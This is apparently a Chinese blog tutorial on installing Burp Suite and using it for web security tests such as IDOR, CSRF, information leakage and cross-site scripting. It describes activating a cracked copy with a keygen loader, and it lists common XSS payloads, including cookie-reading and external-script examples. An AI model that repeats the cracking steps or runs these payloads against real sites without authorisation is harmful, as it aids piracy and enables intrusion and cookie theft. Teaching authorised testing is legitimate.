Burp Suite

Burp Suite是什么

Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多Burp工具,这些不同的burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。

Burp Suite如何安装

1.先安装JDK1.8版本。安装完成后,在电脑上需要验证Java环境。

burp 的java安装 burp suite安装教程_复制粘贴


2.安装Burp Suite

Burp Suite工具安装下载地址:https://portswigger.net/burp/版本区分为社区版本和职业版本。Burp Suite工具支持不同的操作系统安装(windows/mac os/linux平台等)企业版和专业版需要收费,社区版不用收费 基本功能社区版都配置了

这里找了一个破解版的带汉化安装即可

burp 的java安装 burp suite安装教程_burp 的java安装_02


burp 的java安装 burp suite安装教程_Burp_03

下载后,首先打开Burpsuite所在文件夹,找到burp-loader-keygen.jar文件,双击打开


burp 的java安装 burp suite安装教程_Burp_04

设置破解秘钥,如图所示:

将LISENCE中第一个框不发复制粘贴到弹出的框中。然后点击Next,

burp 的java安装 burp suite安装教程_Burp_05

点击:Manual activatio将弹出的小框中第二栏的内容复制粘贴到之前的第二栏中,则会在其第三栏生成一串条文,最后将这串条文复制粘贴到小框的第二个空格即可。

burp 的java安装 burp suite安装教程_html_06

burp 的java安装 burp suite安装教程_Burp_07

以后每次使用都是点击burp-loader-keygen.jar文件,双击打开,点击run,就可以打开Burpsuite软件。

3.Burpsuite设置代理

打开Burpsuite点击Next,进入Burp Suite主页面。如图所示:


burp 的java安装 burp suite安装教程_Burp_08

设置Http代理 拦截请求


这里使用Firefox浏览器进行拦截,首先设置浏览器代理设置,打开firefox浏览器设置->选项->网络设置->手动代理设置如图所示:

burp 的java安装 burp suite安装教程_burp 的java安装_09

打开BurpSuite界面,设置Proxy代理,如图所示:

burp 的java安装 burp suite安装教程_html_10

进入到Intercept页签。如图所示:

Intercept is on 表示开启拦截请求

Intercept is off 表示关闭拦截请求

之后就可以拦截请求了进行抓包了

burp 的java安装 burp suite安装教程_复制粘贴_11

4.导入证书

点击如图所示按钮访问网站,如图所示:

burp 的java安装 burp suite安装教程_burp 的java安装_12

burp 的java安装 burp suite安装教程_burp 的java安装_13

点击下载证书保存

burp 的java安装 burp suite安装教程_Burp_14

在火狐浏览器中,设置–>搜索证书–>导入证书(两个信任选项都要勾选)就导入证书了

使用Burpsuite进行各种测试

(1)、明文传输测试

打开proxy代理在登录界面点击登录就可抓到登录名和密码是否为明文登录

burp 的java安装 burp suite安装教程_复制粘贴_15

(2)、越权漏洞测试

点击修改密码利用proxy代理进行抓包,拿到包数据,把ID进行修改,放包。如果被修改成功即有可能存在漏洞

burp 的java安装 burp suite安装教程_html_16

burp 的java安装 burp suite安装教程_Burp_17

(3)、未授权访问测试

由于没有对相关敏感页面进行访问权限的检查,导致攻击者可未授权访问,从而获取敏感信息及进行未授权操作等。

通过遍历地址上id的参数值可访问到其他用户的个人信息。

burp 的java安装 burp suite安装教程_html_18

(4)、跨站脚本测试

跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。

burp 的java安装 burp suite安装教程_Burp_19

burp 的java安装 burp suite安装教程_html_20

添加XSS代码

burp 的java安装 burp suite安装教程_burp 的java安装_21

就是对用户输入的特殊字符进行html编码,让浏览器只输出文本内容不做js脚本解析执行,如果执行代码就有XSS漏洞

<a>标签
<a href= https://www.baidu.com/>新闻</a>
<a href=javascript:alert(1)>新闻</a>
<img>标签
<img src=http://pic1.sc.chinaz.com/Files/pic/pic9/202005/apic25412_s.jpg />
<img src=x onerror=alert(1) />
<input>标签
<input type="text" />
<input onmouseover=alert(1) />
payload-有效载荷
<script>alert(1)</script> #最普通的xss
<script>alert(document.cookie)</script> #获取cookie
<a href="javascript:alert('xss')">xss</a> #a链接的xss
<script src='http://baidu.com/xss.js'></script> # 外部攻击代码
<img src=x onerror=alert(1)> #加载图形失败执行
<iframe onload=alert('xss')> #框架
<svg onload=alert(1)>
<video onloadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onload=alert(1)>
<style onload=alert(1)></style>
<input onmouseover=alert(1)>

上面是常用XSS攻击代码

(5)、敏感信息泄露测试

通过特殊的攻击向量,使web服务器出现500、404等相关错误,导致信息泄漏如绝对路径、webserver版本、源代码、sql语句等敏感信息,恶意攻击者很有可能利用这些信息实施进一步的攻击。

使用burpsuite获取数据包,修改realname参数值,系统响应错误,同泄露了系统sql语句信息

burp 的java安装 burp suite安装教程_Burp_22

(6)、跨站请求伪造测试

跨站脚本伪造是冒充用户在站内的正常操作。通常由于服务端没有对请求头做严格过滤引起的。CSRF会造成密码重置,用户伪造等问题,可能引发严重后果。

burp 的java安装 burp suite安装教程_Burp_23

burp 的java安装 burp suite安装教程_Burp_24

burp 的java安装 burp suite安装教程_Burp_25

将代码保存到本地,登陆另一账户后访问该页面文件,点击发送请求,如果修改成功代码存在漏洞。

burp 的java安装 burp suite安装教程_html_26